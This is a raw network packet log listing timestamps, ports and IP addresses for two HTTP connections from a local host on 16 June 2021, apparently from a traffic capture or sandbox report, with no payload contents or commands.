Jun 16, 2021 12:29:41.007575035 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.007580996 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.007613897 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.007617950 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.007646084 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.007649899 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.007678986 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.007680893 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.007710934 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.007714987 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.007740021 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.007747889 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.007770061 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.007777929 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.007800102 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.007807970 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.007829905 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.007837057 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.007858038 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.007865906 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.007886887 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.007914066 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.007920980 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.007941961 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.007950068 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.007970095 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.007972956 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.007998943 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.008008003 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.008028030 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.008030891 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.008057117 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.008059978 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.008085012 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.008093119 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.008112907 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.008116007 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.008141041 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.008145094 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.008168936 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.008173943 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.008200884 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.008200884 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.008234978 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.008239031 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.008265972 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.008275986 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.008301020 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.008311987 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.008327961 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.008332968 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.008363962 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.008366108 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.008395910 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.008397102 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.008429050 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.008430004 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.008459091 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.008460999 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.008491039 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.008491993 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.008522034 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.008522987 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.008555889 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.013349056 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.013398886 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.013433933 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.013448954 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.013468027 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.013474941 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.013478041 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.013508081 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.013509989 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.013544083 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.013545990 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.013578892 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.013586998 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.013613939 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.013618946 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.013648987 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.013649940 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.013684034 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.013691902 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.013720036 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.013721943 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.013753891 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.013762951 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.013788939 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.013792038 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.013823032 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.013835907 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.013858080 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.013858080 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.013891935 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.013900995 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.013927937 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.013927937 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.013962984 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.013966084 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.013998032 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.014002085 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.014031887 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.014039993 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.014070034 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.039437056 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.229403973 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.229454994 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.229499102 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.229533911 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.229564905 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.229595900 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.229628086 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.229628086 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.229660988 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.229676962 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.229681015 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.229686022 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.229713917 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.229723930 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.229758024 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.229763031 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.229792118 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.229793072 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.229825020 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.229849100 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.229856014 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.229861975 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.229902983 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.230612993 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.230675936 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.233681917 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.233736992 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.233740091 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.233772993 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.233773947 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.233808041 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.233814001 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.233839989 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.233850956 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.233872890 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.233875036 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.233903885 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.233912945 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.233933926 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.233942986 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.233963013 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.233972073 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.233990908 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.234000921 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.234018087 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.234031916 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.234042883 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.234047890 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.234071016 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.234081030 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.234097004 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.234106064 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.234123945 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.234133005 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.234149933 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.234159946 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.234179974 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.234189987 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.234206915 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.234210014 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.234224081 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.234235048 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.234240055 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.234262943 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.234272003 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.234292984 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.234304905 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.234327078 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.234328985 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.234354973 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.234364986 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.234383106 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.234392881 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.234411955 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.234421015 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.234438896 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.234447956 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.234466076 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.234487057 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.234497070 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.234502077 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.234524012 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.234541893 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.234549999 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.234559059 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.234580994 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.234590054 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.234607935 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.234623909 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.234638929 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.234671116 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.234680891 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.234685898 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.234699965 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.234708071 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.234730005 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.234738111 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.234750986 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.234764099 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.234787941 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.234790087 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.234817028 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.234823942 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.234850883 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.234852076 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.234883070 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.234891891 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.234911919 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.234920025 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.234941006 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.234951973 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.234970093 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.234977961 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.234998941 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.235007048 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.235028028 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.235038042 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.235054970 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.235064983 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.235084057 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.235110998 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.235126972 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.235133886 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.235161066 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.235177994 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.235208035 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.235208988 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.235240936 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.235251904 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.235271931 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.235282898 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.235304117 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.235316992 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.235337019 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.235344887 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.235368013 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.235372066 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.235399008 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.235402107 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.235426903 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.235449076 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.235460043 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.235462904 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.235491991 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.235498905 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.235522985 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.235531092 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.235557079 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.235562086 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.235588074 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.235591888 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.235619068 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.235634089 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.235651016 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.235662937 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.235682011 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.235693932 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.235713005 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.235717058 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.235743999 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.235754013 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.235774994 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.235784054 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.235810995 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.235811949 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.235845089 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.235847950 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.235876083 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.235877991 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.235908985 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.235913038 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.235938072 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.235941887 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.235970020 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.235971928 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.236000061 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.236002922 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.236031055 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.236037016 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.236068964 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.236078024 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.236099005 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.236104012 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.236129045 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.236145973 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.236161947 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.236165047 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.236193895 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.236205101 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.236227036 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.236238003 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.236254930 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.236259937 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.236283064 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.236294985 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.236313105 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.236314058 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.236346960 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.236357927 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.236371994 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.236399889 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.236402988 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.236414909 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.236438036 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.236452103 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.236470938 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.236483097 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.236514091 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.246398926 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.979253054 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:47.587260962 CEST	49168	80	192.168.2.22	63.141.228.141
Jun 16, 2021 12:29:47.747827053 CEST	80	49168	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:47.748136044 CEST	49168	80	192.168.2.22	63.141.228.141
Jun 16, 2021 12:29:47.751147985 CEST	49168	80	192.168.2.22	63.141.228.141
Jun 16, 2021 12:29:47.911469936 CEST	80	49168	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:47.911638975 CEST	49168	80	192.168.2.22	63.141.228.141
Jun 16, 2021 12:29:48.072098017 CEST	80	49168	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:48.545754910 CEST	80	49168	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:48.545856953 CEST	80	49168	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:48.545919895 CEST	80	49168	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:48.545943975 CEST	49168	80	192.168.2.22	63.141.228.141
Jun 16, 2021 12:29:48.545985937 CEST	80	49168	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:48.546049118 CEST	80	49168	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:48.546103954 CEST	49168	80	192.168.2.22	63.141.228.141
Jun 16, 2021 12:29:48.546111107 CEST	80	49168	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:48.546174049 CEST	80	49168	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:48.546195984 CEST	49168	80	192.168.2.22	63.141.228.141
Jun 16, 2021 12:29:48.546219110 CEST	49168	80	192.168.2.22	63.141.228.141
